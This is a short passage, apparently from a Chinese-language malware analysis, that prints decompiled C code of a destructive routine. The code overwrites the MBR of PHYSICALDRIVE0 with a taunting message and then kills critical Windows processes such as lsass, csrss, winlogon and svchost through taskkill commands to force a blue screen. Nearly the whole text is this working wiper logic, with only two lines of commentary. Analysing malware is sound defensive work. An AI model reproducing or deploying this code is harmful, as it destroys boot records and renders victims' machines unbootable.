很清楚
MBR写入垃圾信息显示I am virus! Fuck you :-)',
然后终止系统关键件进程触发蓝屏。
HANDLE __stdcall sub_401100(int a1, int a2, int a3, int a4)
{
HANDLE result; // eax
HANDLE v5; // edi
DWORD BytesReturned; // [esp+8h] [ebp-210h]
DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-20Ch]
__int128 Buffer; // [esp+10h] [ebp-208h]
__int128 v9; // [esp+20h] [ebp-1F8h]
__int128 v10; // [esp+30h] [ebp-1E8h]
char Dst; // [esp+40h] [ebp-1D8h]
__int16 v12; // [esp+20Eh] [ebp-Ah]
memset(&Dst, 0, 0x1CEu);
v12 = -21931;
Buffer = unk_403018;
v9 = unk_403028;
v10 = unk_403038;
result = CreateFileA("\\\\.\\PHYSICALDRIVE0", 0xC0000000, 3u, 0, 3u, 0, 0);
v5 = result;
if ( result != (HANDLE)-1 )
{
DeviceIoControl(result, 0x90018u, 0, 0, 0, 0, &BytesReturned, 0);// FSCTL_LOCK_VOLUME
WriteFile(v5, &Buffer, 0x200u, &NumberOfBytesWritten, 0);
DeviceIoControl(v5, 0x9001Cu, 0, 0, 0, 0, &BytesReturned, 0);// FSCTL_UNLOCK_VOLUME
CloseHandle(v5);
TerminateThisProcess("explorer.exe");
TerminateThisProcess("rundll32.exe");
TerminateThisProcess("taskmgr.exe");
TerminateThisProcess("dwm.exe");
TerminateThisProcess("lsass.exe");
system("shutdown.exe -a");
TerminateThisProcess("winlogon.exe");
TerminateThisProcess("ntoskrnl.exe");
TerminateThisProcess("taskhostw.exe");
TerminateThisProcess("services.exe");
TerminateThisProcess("svchost.exe");
TerminateThisProcess("csrss.exe");
TerminateThisProcess("wininit.exe");
system("taskkill /im lsass.exe /f /t");
system("shutdown.exe -a");
system("taskkill /im ntoskrnl.exe /f /t");
system("taskkill /im svchost.exe /f /t");
system("taskkill /im explorer.exe /f");
TerminateThisProcess("winlogon.exe");
system("taskkill /im winlogon.exe /f /t");
system("taskkill /im csrss.exe /f /t");
result = 0;
}
return result;
}
|